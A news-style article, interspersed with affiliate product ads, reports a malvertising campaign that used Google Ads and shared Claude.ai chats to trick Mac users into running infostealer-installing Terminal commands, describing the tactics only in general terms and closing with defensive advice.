TL;DR
Hackers are using Google Ads and legitimate Claude.ai shared chats to push Mac malware through a malvertising campaign. Researchers have confirmed malicious chat content and delivery methods, but the full scope remains unclear.
Cybercriminals are actively exploiting Google Ads and the shared chat feature of Claude.ai to distribute malware to Mac users, with researchers confirming malicious campaigns involving weaponized chats and malicious links.
Security engineer Berk Albayrak from Trendyol Group identified a shared Claude.ai chat that impersonates an ‘Apple Support’ guide, instructing users to open Terminal and run commands that silently download and execute malware on their Macs. BleepingComputer independently verified a second malicious chat with similar tactics, hosted on different domains and infrastructure.
The malware payloads, retrieved via base64-encoded shell scripts, are highly obfuscated and polymorphic, making detection difficult. One variant performs victim profiling by checking for Russian or CIS-region keyboard settings, then exfiltrates system information and credentials, including browser cookies and Keychain data. Another variant directly harvests sensitive data without profiling, resembling known macOS infostealers like MacSync.
Both campaigns rely on Google Ads that appear to promote legitimate links to claude.ai, but redirect users to malicious instructions hosted within shared chats. Researchers warn that these attacks leverage the trust in AI platforms and legitimate advertising to deceive users into executing harmful commands.
Why It Matters
This campaign highlights the evolving tactics of cybercriminals exploiting AI platforms and advertising channels to target Mac users. The use of shared AI chats for malware delivery represents a new vector that bypasses traditional security measures, increasing the risk of data theft and system compromise. The incident underscores the importance of caution when following terminal instructions from unverified sources and the need for vigilance in digital advertising and AI platform security.
McAfee Total Protection 5-Device | AntiVirus Software 2026 for Windows PC & Mac, AI Scam Detection, VPN, Password Manager, Identity Monitoring | 1-Year Subscription with Auto-Renewal | Download
DEVICE SECURITY – Award-winning McAfee antivirus, real-time threat protection, protects your data, phones, laptops, and tablets
As an affiliate, we earn on qualifying purchases.
As an affiliate, we earn on qualifying purchases.
Background
Malvertising campaigns have previously targeted users searching for software like GIMP or ChatGPT, often using fake domains or phishing sites. This campaign is notable for abusing legitimate AI platform features and Google Ads, which are typically trusted by users. The technique of weaponizing shared AI chats is relatively new, with prior reports of similar abuse involving ChatGPT and Grok. Researchers advise users to download official apps directly from verified sources rather than following suspicious links or chat instructions.
“We found shared Claude chats that serve as attack vectors for malware, with instructions that appear legitimate but actually compromise Mac users.”
— Berk Albayrak, security engineer at Trendyol Group
“Both campaigns used Google Ads pointing to legitimate Claude.ai domains but hosted malicious instructions within shared chats, illustrating a sophisticated abuse of trusted platforms.”
— BleepingComputer
Kaisi Professional Electronics Opening Pry Tool Repair Kit with Metal Spudger Non-Abrasive Nylon Spudgers and Anti-Static Tweezers for Cellphone iPhone Laptops Tablets and More, 20 Piece
Kaisi 20 pcs opening pry tools kit for smart phone,laptop,computer tablet,electronics, apple watch, iPad, iPod, Macbook, computer, LCD…
As an affiliate, we earn on qualifying purchases.
As an affiliate, we earn on qualifying purchases.
What Remains Unclear
It remains unclear how widespread the campaign is, whether other AI platforms are being similarly abused, or if additional variants of the malware are in circulation. The full scope and attribution of the attackers are still under investigation.
The Art of Mac Malware, Volume 2: Detecting Malicious Software
As an affiliate, we earn on qualifying purchases.
As an affiliate, we earn on qualifying purchases.
What’s Next
Security researchers and platform providers are expected to analyze the malware further, develop detection signatures, and strengthen defenses. Users are advised to avoid clicking on suspicious ads and to download software only from official sources. Ongoing monitoring will reveal whether the campaign expands or evolves.
Stellar Data Recovery for Mac Software | Bringing Lost Data Back to Life | 1 PC 1 Year Subscription | Keycard Delivery
Stellar Data Recovery for Mac offers you a whole new experience for fast & safe data recovery on…
As an affiliate, we earn on qualifying purchases.
As an affiliate, we earn on qualifying purchases.
Key Questions
How can I protect myself from this malware campaign?
Always download software from official sources, avoid clicking on suspicious ads, and be cautious when following terminal commands from unverified chats or websites. Keep your macOS and security software up to date.
Are all Google Ads related to Claude.ai malicious?
No, only specific ads promoting ‘Claude download Mac’ or similar keywords are involved. Users should verify the destination URL before clicking and avoid following instructions from untrusted chats.
Is this attack limited to Mac users?
Currently, the campaign appears targeted at Mac users, especially those searching for Claude.ai Mac downloads. There is no confirmed evidence of Windows or Linux targeting in this campaign.
What should I do if I suspect I’ve been compromised?
Disconnect from the internet, run a full security scan with updated antivirus tools, change compromised passwords, and avoid executing unknown terminal commands. Report the incident to security professionals if necessary.
